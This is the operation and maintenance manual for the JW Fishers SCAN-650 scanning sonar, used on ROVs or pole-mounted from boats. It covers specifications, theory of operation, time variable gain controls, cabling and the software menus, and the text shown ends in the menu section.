- ngansoplili askedEvaluate the software applications that have been developed to assist project managers in their job... Show moreEvaluate the software applications that have been developed to assist project managers in their job of planning and managing software development projects. Search computer magazines or the Web for recent reviews of project management software. Which packages seem to be the most popular? What are the relative strengths and weaknesses of each package? What advice would you give to someone intending to buy project management software for a personal computer? Why?
1 answer
- SourCouch5342 asked:
NO HALFWAY SOLVED OR UNCOMPLETED ANSWERS!!
Write a program which calculates the integral of the function
f(x)=B*exp(-x^2.5)+(A*x^n)/m!
on the interval from a to b (0<a<b). In the main program, scanf
a double value for n and a non-negative integer value for m,
nonzero double values for A and B, and positive double values for a and b>a.
Call the function Integr() to evaluate the integral.
Your main program should be followed by three functions:
double Integr(double n, int m, double A, double B, double a, double b)
double func(double x, double n, int m, double A, double B)
double mfact(int m)
When writing the function Integr(), use the program w4-10.c, appropriately
modified to integrate an arbitrary function f(x) from a to b
(let the program ask you for n_trap only once, and scan
sufficiently large value for n_trap; also print the length
of the corresponding sub-interval del_x). Within Integr() call another
function func() to evaluate f(x). The return value of func() should
be equal to B*exp(-x^2.5)+A*x^n if m=0, or B*exp(-x^2.5)+A*x^n/m! if m>0.
To evaluate m! call the function mfac() that you will also create.
To evaluate x^n call the function pow(), which is embedded in
the math.h library.
................................................................
Your output should look like this:
Enter the exponents (double)n and (int)m: 1.5 6
Enter the coefficients A and B: 2.5 -3.75
Enter the bounds for the integration interval, a < b : 1.05 4.05
Integrate f(x) on [a,b]
Enter the number of trapezoids: 10000
The length of the subinterval del_x = .......
The value of the integral is ...... .
1 answer
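The assignment is in C, but the trapezoid-rule structure it describes (Integr calling func, func using the factorial) can be sketched language-neutrally; integr and func here follow the signatures in the question, with the file-reading and prompting omitted:

```python
import math

def integr(f, a, b, n_trap):
    # Composite trapezoid rule on [a, b] with n_trap sub-intervals
    # of width del_x = (b - a) / n_trap.
    del_x = (b - a) / n_trap
    total = 0.5 * (f(a) + f(b))
    for k in range(1, n_trap):
        total += f(a + k * del_x)
    return total * del_x

def func(x, n, m, A, B):
    # f(x) = B*exp(-x^2.5) + A*x^n / m!   (m! is 1 when m = 0)
    return B * math.exp(-x ** 2.5) + A * x ** n / math.factorial(m)

approx = integr(lambda x: func(x, 1.5, 6, 2.5, -3.75), 1.05, 4.05, 10000)
print("The value of the integral is", approx)
```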
- Anonymous asked:
You guys didn't do exercise 7.41 in C++ How to Program, 7th edition, by Paul Deitel and Harvey M. De…
0 answers
- ngansoplili asked:
Suppose you are working in a consulting company that has been contracted to build a Web-based e-commerce site for Poodles & Noodles Incorporated. In one of your initial conversations with the client, the client states, "I don't want to waste time on unproductive things such as project management and planning. I want to start building this system immediately." For each stage of the systems development cycle (SDC), do the benefits of performing the stage outweigh the costs? Which steps of the structured walkthrough can be omitted for this project? Do you think that the participants and their roles in the walkthrough would vary for a different project? Justify your response, and provide relevant examples.
0 answers
- Anonymous asked:
The header file for a C program is called "Question7.h". Write a C function which:
• Is called copyData
• Has the following parameters:
o A char pointer called originalFileName
o A char pointer called copyFileName
• Opens the file for reading whose name is contained in the originalFileName
parameter.
• If the file cannot be opened successfully then the function should just output an
error message to the user.
• Opens a file for writing whose name is contained in the copyFileName
parameter.
• If the file cannot be opened successfully then the function should just output an
error message to the user.
• The function should read the numbers listed in the file originalFileName and
write the numbers into copyFileName with a field width of 8 and 3 decimal
places.
• The file originalFileName contains integers stored on one line separated by
spaces.
1 answer
- DecisiveSquare255 asked:
1) Modify the program Amortize by inserting a function FindPayment( ) that will compute the monthly p…
1 answer
- GoldenSushi4669 asked:
Write a program to play a lottery game. The program generates a random two-digit…
2 answers
- Anonymous asked:
Question 1:
Show that ~(p V (~p Λ q)) = ~p Λ ~q
(Hint: don't specify by taking sets; use a general approach.)
1 answer
- Anonymous asked:
Fig. 11.30
(1) <L> -> ( <E> <T>
(2) <T> -> , <E> <T>
(3) <T> -> )
(4) <E> -> <L>
(5) <E> -> atom
The grammar in Fig. 11.30 defines nonempty lists, which are elements
separated by commas and surrounded by parentheses. An element can be either an
atom or a list structure. Here, <E> stands for element, <L> for list, and <T>
for “tail,” that is, either a closing ), or pairs of commas and elements ended by ).
Write a recursive-descent parser for the grammar of Fig. 11.30.
0 answers
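The grammar maps directly onto one parsing function per nonterminal; this Python sketch (the target language is not specified in the question) treats every non-punctuation token as "atom" for simplicity:

```python
def parse(tokens):
    # Recursive-descent parser for:
    #   <L> -> ( <E> <T>      <T> -> , <E> <T> | )      <E> -> <L> | atom
    pos = 0

    def peek():
        return tokens[pos] if pos < len(tokens) else None

    def expect(tok):
        nonlocal pos
        if peek() != tok:
            raise SyntaxError(f"expected {tok!r}, got {peek()!r}")
        pos += 1

    def parse_L():          # <L> -> ( <E> <T>
        expect("(")
        parse_E()
        parse_T()

    def parse_T():          # <T> -> , <E> <T>  |  )
        nonlocal pos
        if peek() == ",":
            pos += 1
            parse_E()
            parse_T()
        else:
            expect(")")

    def parse_E():          # <E> -> <L>  |  atom
        if peek() == "(":
            parse_L()
        else:
            expect("atom")

    parse_L()
    if pos != len(tokens):
        raise SyntaxError("trailing input")
    return True

print(parse(["(", "atom", ",", "(", "atom", ",", "atom", ")", ")"]))  # True
```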
- Anonymous asked:
Write a program to play a lottery game. The program generates a random two-digit number and p…
1 answer
- Snail2011 asked:
import java.util.Scanner;
public class Assign
{
public static void main(String[] args)
{
int number, size;
char command;
Scanner scan = new Scanner(System.in);
// ask a user for a array size
System.out.println("Please enter a size for the array.\n");
size = scan.nextInt();
// instantiate a NumberCollection object
NumberCollection collection = new NumberCollection(size);
// print the menu
printMenu();
do
{
// ask a user to choose a command
System.out.println("\nPlease enter a command or type ?");
String input = scan.next();
command = input.charAt(0);
switch (command)
{
case 'a': // add a number
System.out.println("\nPlease enter an integer to add.");
number = scan.nextInt();
boolean added;
/*** ADD YOUR CODE HERE ******************************************************/
if (added == true)
System.out.println(number + " was added");
else
System.out.println(number + " was not added");
break;
case 'b': // remove a number
System.out.println("\nPlease enter an integer to remove.");
number = scan.nextInt();
boolean removed;
/*** ADD YOUR CODE HERE ******************************************************/
if (removed == true)
System.out.println(number + " was removed");
else
System.out.println(number + " was not removed");
break;
case 'c': // display the array
/*** ADD YOUR CODE HERE ******************************************************/
break;
case 'd': // compute and display the maximum
/*** ADD YOUR CODE HERE ******************************************************/
break;
case 'e': // compute and display the minimum
/*** ADD YOUR CODE HERE ******************************************************/
break;
case 'f': // compute and display the sum
/*** ADD YOUR CODE HERE ******************************************************/
break;
case '?':
printMenu();
break;
case 'q':
break;
}
} while (command != 'q');
} //end of the main method
// this method prints out the menu to a user
public static void printMenu()
{
System.out.print("\nCommand Options\n"
+ "-----------------------------------\n"
+ "a: add an integer in the array\n"
+ "b: remove an integer from the array\n"
+ "c: display the array\n"
+ "d: compute and display the maximum\n"
+ "e: compute and display the minimum\n"
+ "f: compute and display the sum\n"
+ "?: display the menu again\n"
+ "q: quit this program\n\n");
} // end of the printMenu method
} // end of the Assignment6 class
Number Collection ..... Java program 2
import java.text.NumberFormat;
import java.util.Scanner;
public class NumberCollection
{
private int count;
private int [] numberarray;
public NumberCollection ( int arraySize)
{
count = 0;
numberarray= new int[arraySize];
}
private int indexOf(int searchingNum)
{
for (int i = 0; i < numberarray.length; i++)
if (numberarray[i] == searchingNum)
return i; //return the index number of the desired searching number, if one is available
return -1;
}
public boolean addNumber(int numberToAdd)
{
if (this.indexOf(numberToAdd) == -1)
{
if (count < (numberarray.length - 1))
{
numberarray [count] = numberToAdd;//add the parameter number at the smallest available index
count++;
return true;
}
else if (count == (numberarray.length - 1))
{
//double arrayCapacity();
numberarray [count] = numberToAdd;
count++;
return true;
}
}
return false;//return false by default.
}
public boolean removeNumber(int numberToRemove)
{The method checks if the integer specified by the parameter exists in the array (This can be done using the indexOf method to see if it returns -1 or not) and if it does, it moves the number stored in the last index (count-1) to where numberToRemove was found, and changes the content at the last index (count-1) to 0, decrements count, and return true. Otherwise, it returns false.}
private void doubleArrayCapacity()
{It is a helper method and doubles the capacity of the numberArray. To do this, you will need to create another array with the doubled size first, then copy the content of numberArray to this temporary array. Then the address of the temporary array can be copied to numberArray.}
public int findMax()
{It finds the maximum number among the numbers stored so far (at the time when this method is called), and returns it. If the array is empty, return 0.}
public int findMin()
{It finds the minimum number among the numbers stored so far (at the time when this method is called), and returns it. If the array is empty, return 0.}
public int computeSum()
{It computes and returns the sum of numbers stored in the numberArray so far (at the time when this method is called.) If the array is empty, return 0.}
public String toString( )
{Returns a String containing a list of numbers stored in the numberArray. An example of such a string can be:
(3, 6, -1, 3, 23, -50, 43)
The string should start with a '(' and end with a ')'.}
1 answer
- Anonymous asked:
// Draw a bouncing ball on the window for 10 seconds.
// The ball has a specific color, size, location, and direction.
// (x,y) is the upper left corner of the first location.
// Every 10 ms, the ball should move dx pixels horizontally
// and dy pixels vertically.
public static void bounceLoop(DrawingPanel panel, Graphics g, Color c,
int size, int x, int y, int dx, int dy)
Each repetition should do the following:
1. Move the ball to a new position.
2. Update x and y. Specifically, add dx to x and add dy to y.
3. Update dx and dy if needed. The ball needs to change direction
(bounce) when the ball "hits" the side of the window.
4. Pause for 10 ms.
2 answers
- Anonymous asked:
… typical users at a peak of 1 … RAID 5, and RAID 6.
3 answers
Basic Event Handling in C#
To illustrate event handling, you will make a news service that notifies its subscribers when an event (new news) occurs. Subscribers can unsubscribe and subscribe at will.
The Delegate
The delegate lets the subscriber know what type of method can be notified. Essentially, the news service says "In case of an event occurring, I'll notify any registered method so long as it has the same signature as the delegate," and the subscriber says, "Okay, register this method." The method could be in any class.
You will use the following classes:
- NewsService: Notifies the subscribers when events (new news) occur.
- Subscriber: Instances subscribe to the news service, indicating what method should be notified.
- News: Instances of this class are the parameters passed from the news service to the registered method. Contrary to what most people seem to think, it does not have to inherit from EventArgs. Any parameters can be passed.
using System;

// The delegate indicates what types of methods can be notified of
// an event.
// The method(s) must have the same signature as the delegate.
public delegate void NewsDelegate(News news);

public class News
{
    public string news;
    public News(string news) { this.news = news; }
}

// This class notifies subscribers when the specified event occurs.
// In this case, the event is that newNews() is called.
public class NewsService
{
    // Must have the following format: public event delegateName
    // anyName
    public event NewsDelegate NewsEventSubscribers;

    public void newNews(string news)
    {
        Console.WriteLine("An event! New news.");
        // first check whether there are subscribers to this event
        if (NewsEventSubscribers != null)
        {
            // This will send an instance of News to each subscriber of
            // local news
            NewsEventSubscribers(new News(news));
        }
    }

    public NewsService() { }
}

public class Subscriber
{
    public string name;
    NewsDelegate delNews;

    public void SubscribeNewsService(NewsService ns)
    {
        // Create a new NewsDelegate. Its parameter is the method to
        // notify when the event occurs. This method also may be in
        // another class, in which case the parameter is
        // InstanceOfSomeOtherClass.method.
        delNews = new NewsDelegate(WriteNews);
        // Register the delegate with the NewsService
        ns.NewsEventSubscribers += delNews;
        Console.WriteLine(name + " subscribed to news.");
    }

    public void UnsubscribeNewsService(NewsService ns)
    {
        // unsubscribing
        ns.NewsEventSubscribers -= delNews;
        Console.WriteLine(name + " unsubscribed to news.");
    }

    // This method must have the same signature as
    // the delegate NewsDelegate declared above.
    public void WriteNews(News e)
    {
        Console.WriteLine(name + " received news: " + e.news);
    }

    public Subscriber(string name) { this.name = name; }
}

class MakeNews
{
    static void Main(string[] args)
    {
        NewsService ns = new NewsService();
        Subscriber julie = new Subscriber("Julie");
        julie.SubscribeNewsService(ns);
        Subscriber matthew = new Subscriber("Matthew");
        matthew.SubscribeNewsService(ns);
        ns.newNews("More money for schools.");
        julie.UnsubscribeNewsService(ns);
        ns.newNews("New mayor.");
    }
}
The output:
Julie subscribed to news.
Matthew subscribed to news.
An event! New news.
Julie received news: More money for schools.
Matthew received news: More money for schools.
Julie unsubscribed to news.
An event! New news.
Matthew received news: New mayor.
My teacher makes us use prn statements after every single cout so we can
show our work. Anyway, I just got C++ at home and I can't get the prn's to
work.
Here's my simple program
#include <fstream.h>
#include <iostream.h>
#define PRINT_IT ofstream prn("PRN")
PRINT_IT;
main()
{
cout << "Blah";
prn << "Blah";
return 0;
}

Blah comes up on the screen and nothing goes out the printer. Any ideas
would help greatly. I have an HP 722C printer if that is of any help on
LPT1. That is how it is set up at school exactly and it won't work at home. | http://www.verycomputer.com/41_6a0065e4a62dad83_1.htm | CC-MAIN-2020-16 | refinedweb | 119 | 92.73 |
This C++ program demonstrates overloading of assignment (=) operator. The program defines a class, defines the assignment operator for the class, creates an instance of the class and demonstrates its use.
Here is the source code of the C++ program which demonstrates overloading of assignment (=) operator. The C++ program is successfully compiled and run on a Linux system. The program output is also shown below.
/*
* C++ Program to Demonstrate Overloading of Assignment (=) Operator
*/
#include <iostream>
using namespace std;
class Int {
int i;
public:
Int(int ii = 0) : i(ii) { }
        Int& operator=(const Int& ii) { i = ii.i; return *this; } // return *this so assignments can chain
int get() { return i; }
void set(int ii) { i = ii; }
};
int main()
{
Int a(10), b(20);
cout << "Initial values" << endl;
cout << "a::i = " << a.get() << endl;
cout << "b::i = " << b.get() << endl;
cout << "After operation a = b" << endl;
a = b;
cout << "a::i = " << a.get() << endl;
cout << "b::i = " << b.get() << endl;
}
$ a.out
Initial values
a::i = 10
b::i = 20
After operation a = b
a::i = 20
b::i = 20
Sanfoundry Global Education & Learning Series – 1000 C++ Programs.
If you wish to look at all C++ Programming examples, go to C++ Programs. | http://www.sanfoundry.com/cpp-program-demonstrate-overloading-assignment-operator/ | CC-MAIN-2018-09 | refinedweb | 191 | 66.54 |
SCAN-650 Scanning Sonar OPERATION MANUAL JW FISHERS MFG INC rev 811
SCAN-650 Scanning Sonar
OPERATION MANUAL
rev 811

JW FISHERS MFG INC
1953 COUNTY ST. E. TAUNTON, MA USA
(508) ; (800) ; FAX (508) WEB:
SCAN-650 Scanning Sonar
OPERATION AND MAINTENANCE MANUAL
Surface Sonar Processor Included
TABLE OF CONTENTS
CAUTIONS ... 4
SPECIFICATIONS AND OPTIONS ... 5
MINIMUM SYSTEM REQUIREMENTS ... 6
INTRODUCTION ... 7
SYSTEM COMPONENTS ... 9
THEORY OF OPERATION
OPERATOR SWITCHES AND CONTROLS
INSTALLING HARDWARE AND SOFTWARE
CABLING THE SYSTEM
ATTACHING TO ROV
OPERATION
SAMPLE PLAYBACK
SAMPLE RECORDING
FAQs
TROUBLESHOOTING
APPENDIX A (configuring GPS)
APPENDIX B (USB to Serial Adaptor)
MAINTENANCE
WARRANTY
CAUTIONS:
- Do not allow the SCAN-650 to be exposed to excessive heat by leaving it in direct sunlight or inside a closed vehicle on a hot day. Excessive heat can build up inside the housing, which can damage the electronics and/or destroy the waterproof seals.
- Take special care of the black flexible boot located on the top of the scanning head. The black flexible boot is an acoustic window that should be kept clean (soap and water) and protected from damage.
- Do not remove the (6) screws that hold the black flexible boot in place on the scanning head. The scanning head contains a liquid that will drain out if the screws are loosened.
- Do not remove the black hex head bolt on the scanning head (present only on the 2-piece SCAN-650).
- When mounting the scanning head, be sure the arrow on top of the scanning head is pointing forward; this direction will be the top of the screen on the PC.
SPECIFICATIONS

PERFORMANCE/DESCRIPTION:
- Frequency: khz
- Beamwidth (horizontal x vertical): deg by 40 deg
- Ranges: 5, 10, 20, 40, 60 meters / 33, 66, 132, 198 feet
- Max depth: m / 1,000 ft
- Input voltage, Sonar Processor: vdc or 120/220 vac (5 watt)
- Input voltage, Scanning Head: from Sonar Processor, or 9-36 from ROV
- Cable: 2 or 4 conductor

DIMENSIONS/WEIGHT:
- Sonar Processor: 8"W x 9"D x 2.5"H; 2 lbs / 0.9 Kg
- 650A Scanning Head and housing: "Dia x 10.5"L; lbs / 1.6 Kg (air); lbs / 0 Kg (water)
- 650B Scanning Head: "Dia x 4"L; lbs / .6 Kg (air); lbs / .17 Kg (water)
- 650B Housing: Dia x 9"L; lbs / 1.2 Kg (air); lbs / 0 Kg (water)

Note: If 180 sweep, cut times in half; if 90 sweep, cut times by four, etc.

OPTIONS:
- Up to 600 meters / 2,000 feet of cable
- Carrying case
SCAN-650 MINIMUM SYSTEM REQUIREMENTS
- CPU: Intel or AMD, 500MHz
- System memory: 64 Mb RAM (a faster CPU and more RAM will allow faster scanning)
- One available USB port
- Windows 98 or later
- 15 Mb of free disk space for program installation
- Disk space for file recording:
    5 Meter Range: .5 deg step - meg/hr, hrs/cd, 90 hrs/dvd; 2 deg step - meg/hr, hrs/cd, 200 hrs/dvd
    10 Meter Range: .5 deg step - meg/hr, hrs/cd, 170 hrs/dvd; 2 deg step - meg/hr, hrs/cd, 270 hrs/dvd
    60 Meter Range: .5 deg step - meg/hr, hrs/cd, 345 hrs/dvd; 2 deg step - meg/hr, hr/cd, 400 hrs/dvd
- Video card capable of: 16 bit color; screen area of 800 x 600 pixels (minimum)
- Optional: CD or DVD burner for archiving files

Note: For the fastest scanning capability, shut down all other programs (including virus scan).
INTRODUCTION

The SCAN-650 is a high performance imaging sonar system available in two different package configurations, which enables it to be used on large or small ROVs. It can also be pole-mounted and used from a small boat in shallow water.

The SCAN-650A configuration is used with larger ROVs, or when the main application is boat-deploying the unit on a pole (see photo next page). The black scanning head is connected permanently to the electronics module. A cable (not shown) comes out of the bottom of the electronics module and connects to the Sonar Processor.

The SCAN-650B configuration is used with smaller ROVs. The black scanning head is mounted to the front of the ROV, and a short cable connects the head to the electronics module, which is mounted on the side or under the ROV. Cabling options include a hardwired version, where a cable comes out of the bottom of the electronics module and connects directly to the Sonar Processor, or a set of short wires equipped with underwater connectors and a hull penetrator. This option allows the wiring from the scanning head to enter the ROV. The scanning head can draw power from the ROV and utilize (2) spare wires in the ROV umbilical cable for communication with the Sonar Processor.

The Sonar Processor is located in the boat and allows fine tuning of the signal from the electronics module prior to being displayed and recorded on the PC. It is used with both of the above models. The Sonar Processor also includes an interface for a GPS receiver.
Mounting the scanning head on a pole allows it to be deployed from a boat in shallow water.

When operating in shallow water, the scanning head can be taped or clamped to a pole and deployed over the side of a boat or off a dock. The pole must be held very steady (and there should be no waves if deployed from a boat) to ensure a clear picture. If the surface conditions are too rough, the scanning head can be attached to a tripod and lowered to the bottom (2 off bottom for small targets) to provide clear images.

There are times when it is advantageous to deploy the scanning head inverted (upside down). This might occur when deploying on a pole. The software allows inverted scanning (see Settings Menu, pg 18).

[Figure: pole deployment] The SCAN-650 transducer (black end) is positioned downward when operating with a pole. Be sure the transducer is below the bottom of the pole (so the pole does not interfere with the signal).

[Figure: tripod deployment] The target below is a pickup truck (note the large black shadow) located in 18 feet of water. The scanning head was mounted on a pole which was deployed from a small boat (see top photo).

The most common application is mounting the scanning head on an ROV. The ROV can rest on the bottom or hover just off the bottom while the sonar scans 360 degrees looking for targets.

[Photo: SCAN-650 scanning head mounted on Fishers SeaLion ROV.]
SYSTEM COMPONENTS

Signals from the scanning head travel up the cable to the Sonar Processor on the surface. The signals are processed and sent to the PC, where the signal is displayed and recorded. The boat's GPS receiver can also be connected to the Sonar Processor. If connected, the boat's latitude and longitude will be displayed and recorded by the PC.

[Diagram: Transducer Head and Electronics -> cable to surface -> Sonar Processor -> USB port -> PC (customer supplied); Boat's GPS -> Sonar Processor]

The Sonar Processor connects to any available USB port on the PC. (Note: It is best to use the same physical USB port every time you operate.)

The Sonar Processor can be powered by 9-12 vdc. A 120/220 vac to 12 vdc wall transformer is supplied to power the system from a 120/220 ac voltage supply. A cable with battery clips is supplied to power the sonar from a 12 volt battery.

[Photos: Wall Transformer; Cable for 12 v battery]
THEORY OF OPERATION

SONAR BASICS
Sonar is the bouncing of an acoustic signal off a target and then measuring the time it takes to return - thus giving us distance - and measuring the size or amplitude of the returned signal - thus giving us the hardness of the target. Since the speed of sound in water is known (1500 meters per second), it is easy to determine the distance to a target by simply measuring the time it takes to make the round trip and dividing by two. If we examine the size of the returned signal (amplitude), we can determine if the sonar signal hit a soft object (mud bottom) or a hard object (rocky bottom). The muddy bottom will absorb much of the signal, with very little signal (echo) being returned. The rocky bottom produces a large echo, which is called a hard return.

The acoustic signal is produced by a transducer. In operation, the transmitter generates an electrical pulse which is applied to the transducer. The transducer converts this pulse to a mechanical vibration which produces an oscillating pressure wave in the water, thus forming a sound pulse. The pulse then travels away from the transducer until it strikes an object, at which point some portion of the pulse is reflected back to the transducer as an echo. When the echo returns to the transducer, the transducer is mechanically excited by the sound pressure and converts the vibration into an electrical signal. This signal is then detected and amplified by the receiver. The control/display unit regulates the precise timing between the transmitter, receiver and display elements.

DEPTH SOUNDER
Depth sounders are a simple form of sonar. They send out a conical-shaped energy pulse toward the bottom, listen for the return, calculate the time it took, and display the answer in feet (of depth). If your depth sounder has a display or a printout, a line will be drawn representing the bottom. Because the beam is so wide (15 to 30 deg), the beam will be on the object for a long time as you pass over it.
As a result, even smaller objects appear to be quite large on the printout. Fish show up as large arcs on the display. Depth sounders typical operate at a frequency of between 50kHz and 200kHz. Good for long range but not for detecting small targets SCANNING SONAR Scanning sonar refines the process by decreasing the beam width to a very narrow 2 deg (2 deg by 40 deg fan shaped beam) and dramatically increasing the frequency of the signal (typically 600kHz range). The very narrow fan shaped beam and high frequency dramatically improves the detail of the objects on the bottom. The fact that scanning sonar sweeps the beam back and forth across the bottom gives a major improvement over the depth sounder printout for bottom detail. Not only can very small targets be detected but the details of the target can be seen. Signal SCAN-650 SCAN-650 Signal Side View (fan shaped signal) Top View (very narrow signal) 11
12 THEORY OF OPERATION (continued) Fish Transducer The JW Fishers SCAN-650 scanning sonar operates by transmitting a short, high energy, narrow width acoustic wave. This high energy acoustic wave hits directly below the transducer first (as shown below) Acoustic Wave 100 m Range Switch Target #1 Target #2 3 meters 10 m Fish Transducer 25 meter range 100 m As the pulse continues to sweep across the bottom, away from the transducer, echoes continuously return to the transducer (see below). The returning echos strike the transducer which produce the return electrical signals. A look at returning echoes Returning Echos 100 m Range Switch Hard Return No Return Echos (Shadow) #1 Light Return Medium Return Acoustic Wave Hard Return #2 3 meters 10m 25 meter range 100 m The harder the object (rocks, metal, etc ), the larger the returned echo. The angle of the bottom surface and target angles also impact the amplitude of the return signal. The left side of target #1 and #2 will produce a larger (harder) return echo than the top area. When the acoustic wave hits the top of the target, some of the echo is reflected away from the fish. When the bottom slopes away and down from the fish, only light echo s return from the bottom. When the bottom slopes upward, medium echo returns are received. If a hard target is positioned on a down or on a up-sloping bottom, a hard return will result from the target. If a target is up off the bottom, as is target #1 and #2, then there will be an area directly behind the target that will be blocked from the acoustic wave. No echo returns will be received from that area by the fish. When displaying this area, the display will show a no signal color. This area on the display is called the target s shadow. The return electrical signals are amplified by the preamp and sent up the cable to be processed by the time variable gain (TVG) circuit in the Sonar Processor. (Refer to page 15 for a more details on the TVG circuit.) 12
13 THEORY OF OPERATION (continued) After the return signals are processed by the TVG, the Sonar Processor takes evenly spaced samples of the echo returns which are processed and displayed on the PC screen as a very narrow sector that changes color along it s length depending on the intensity of the reflected signal.the amplitude of the returned echo samples, during one line, determines the color for each point along the line. The larger the amplitude of the return, the greater the change of color on the display. Every one pulse out of the transducer fills one degrees per step sector. Screen View 0 deg 270 deg Single line displayed on the screen. The width of this sector is determined by the Degrees per Step setting. SCAN deg 180 deg Continuous 360 degree sweep or any portion of 360 degrees. After the line is displayed, the transducer head (scanning head) rotates (steps) slightly to the right and the sequence is repeated. The smaller the step (1/2, 1, 1 1/2, or 2 degree) the higher the resolution of the picture. The transducer s continuous stepping fills the display with the sonar image. The sequence is repeated, and if nothing moves (targets or sonar), then the identical picture will be overlaid over the previous picture (one line at a time). If a 360 degree continuous sweep is selected, at 1 degree steps, then 360 steps will make up a complete picture (720 steps for 1/2 degree). 13
14 TIME VARIABLE GAIN (TVG) The Sonar Processor contains a TVG circuit on the PC board that receives the echo signals from the fish preamplifier boards. The TVG circuit amplifies and makes time variable gain adjustments to the signal to make up for signal losses which occur when the echoes are traveling through the water; the greater the range, the greater the losses. TheTVG circuit has its own set of operator controls which are located of the Sonar Processor s top panel. The controls are NEAR GAIN, FAR GAIN, and OVERALL GAIN. The signal return (Fig 2) to the Sonar Processor is the signal that we would expect to see at the output of the fish preamps. The amplitude of the signal that reaches the Computer determines the color of the image. If the TVG circuit did not modify the signal shown below (Fig 2), then the display would start out good, but the bottom return would quickly turn to a color indicating no return. If the return from target #2 was real strong, it might "pop out" of the light background and print a light image. Fish Transducer Acoustic Wave Fig m Range Switch Target #1 Target #2 3 meters 10 m 25 meter range 100 m A m p l i t u d e #1 Shadow Fig 2 Signal to Sonar Processor before TVG Transmit pulse 8" Next transmit pulse #2 Shadow The signal (Fig 2 ) feeds the input of the TVG amp. The TVG amp has been adjusted, by the operator, to automatically increase the gain over time. The next drawing below (Fig 3) shows the gain increase (called the ramp). The last drawing below (fig 4)shows the output of the TVG amp with the ramp applied to the input. When this signal is displayed, there will be a even color across the paper with two light colors representing the two targets. G a i n Low Gain Fig 3 High Gain Transmit pulse Next transmit pulse A m p l i t u d e Transmit pulse Fig 4 #1 #2 Signal with TVG ramp applied Shadow Shadow Next transmit pulse 14
15 The TVG amplifier has three operator controls. They are located on the top panel of the Sonar Processor. Recommended settings for the TVG controls are provided in the Operation Section of this manual. Final TVG adjustments are made by the operator while the unit is running. The function of these controls is to adjust the amplifiers to compensate for losses that occur when the signal travels through the water. When they are adjusted properly, a reasonably even color is displayed across the screen during side scanning. The even color is the result of reflections off the bottom. 5 6 LEFT TVG CHANNEL ADJUSTMENTS GAIN OVERALL NEAR GAIN FAR GAIN OVERALL NEAR GAIN GAIN Near Gain - Adjusts the TVG gain at the start of the sweep (objects close to the scanning head). Far Gain - Adjusts the TVG gain at the finish (objects furthest from the scanning head). Operator adjusts for even color of the displayed line. Overall Gain - Adjusts the gain of the complete line up or down. It adjusts overall darkness or lightness. A m p l i t u d e Near Gain Overall Gain Increases Or Overall gain adjusts the overall amplitude of the signal Decreases (increases The Overall or Gain decreases it). (Amplitude) Of The Complete Line Far Gain 15
16 OPERATOR SWITCHES AND CONTROLS THE HARDWARE Scanning Head(transducer module): The scanning head does not contain any operator switches or controls. The scanning head is factory calibrated and should not be opened. Sonar Processor: The Sonar Processor amplifies and conditions the signal from the scanning head. The amplifier in the Sonar Processor is called a Time Variable Gain (TVG) amplifier. The gain of the amplifier increases over time for each returning signal. The operator has very precise control of the TVG amplifier using the three gain controls. The Near Gain, Far Gain, and Overall Gain controls on the front of the Sonar Processor are adjustments for the Time Variable Gain (TVG) amplifier. The goal of these adjustments is to adjust the amplifiers to compensate for signal losses that occur when the signal travels through the water. When they are adjusted properly, a reasonably even color will represent the ocean floor from the center to the outer edge of the scanned area. (See page 15 for a detailed description of the TVG) SONAR PROCESSOR Computer: The system will run on a Laptop, Desktop, or on JW Fishers optional Splash Proof computer. The Splash Proof is a computer system that is built into a Underwater Kinetics case. It utilizes a 10 Ultra Bright display which is much easier to read in a open boat.the Sonar Processor has an integrated interface board that converts the analog signals to digital, and inputs the signal to the computer. The computer takes the digital signal, displays it, and stores it for future reference. The software has numerous toolbars and pull down menus for controlling the display. There is also communications from the computer to the transdcucer which allow the operator to control different functions within the Fish. 16
17 OPERATOR SWITCHES AND CONTROLS (continued) SONAR PROCESSOR POWER INPUT - The power input for the Sonar Processor can be any voltage between 9 and 12 volts dc. A wall transformer is also supplied with the SCAN-650 which allows the Sonar Processor to be powered from 120/220 volts ac. The wall transformer converts 120/220 volts ac to 12 volts dc. A dc power cable with red and black alligator clips on the end is also supplied with the system; the dc cable can be connected to any high capacity 9 to 12 volt battery (such as a 12v automobile battery). POWER SWITCH - When switched to the ON position power is applied to the processor s electronics and the green LED is illuminated. If the cable to the scanning head is connected (it should be before power is turned on) then power is also sent to the downstairs electronics. PC INTERFACE - A USB cable connects the Sonar Processor to the PC GPS/LORAN INPUT connector - Your GPS plugs into this connector. The Sonar Processor requires a NMEA 0183 input. It may be necessary to select this type of input from a menu in the GPS or LORAN unit (see page 34 Appendix A for more detail). CABLE LENGTH COMPENSATION switch Adjusts the gain of an amplifier to compensate for the various lengths and qualities of signal cables that can be used with the system. Switch position 1 is used for shorter cables (such as a 150ft cable). Switch position 5 is used for long cables (such as a 2000ft cable). TRANSDUCER HEAD (SCANNING HEAD) connector - The cable from the Scanning Head Electronics attaches to this connector. NEAR GAIN CONTROL - Adjusts the gain for objects close to the scanning head. FAR GAIN CONTROL - Adjusts the gain of TVG amplifier so that the reflected signal from objects farthest from the Head can be amplified sufficiently to produce an image on the monitor. OVERALL GAIN CONTROL - Adjusts the darkness of the sonar image in the selected color. 17
18 OPERATOR SWITCHES AND CONTROLS (Continued) - THE SOFTWARE The majority of operator controls are located in toolbars on the screen. The number of tools in each toolbar, and therefor the number of toolbars, will depend on the resolution setting on your computer display. The resolution setting for the display below was 1024 by 768. Top Toolbar File Position Toolbar Mode/Screen Toolbar Playback Speed Bar or Sweep Speed Bar Settings Toolbar Sweep origin (scanning head) Sweep progress indicator Range mark rings on the display make it easy to determine the distance from the sonar head to the target. SOFTWARE MENUS: There are 5 pulldown menus available: FILE, VIEW, ACTIONS, SETTINGS and HELP. The selections available under each heading: File: Record new file - This is used to record a new sonar file. Open file - Use this to open an existing sonar file for playback. Save screen as a picture - Saves the image on the sonar screen as a Bitmap file. Print screen - Prints the image shown on the screen. Exit - closes the SCAN-650 program. 18
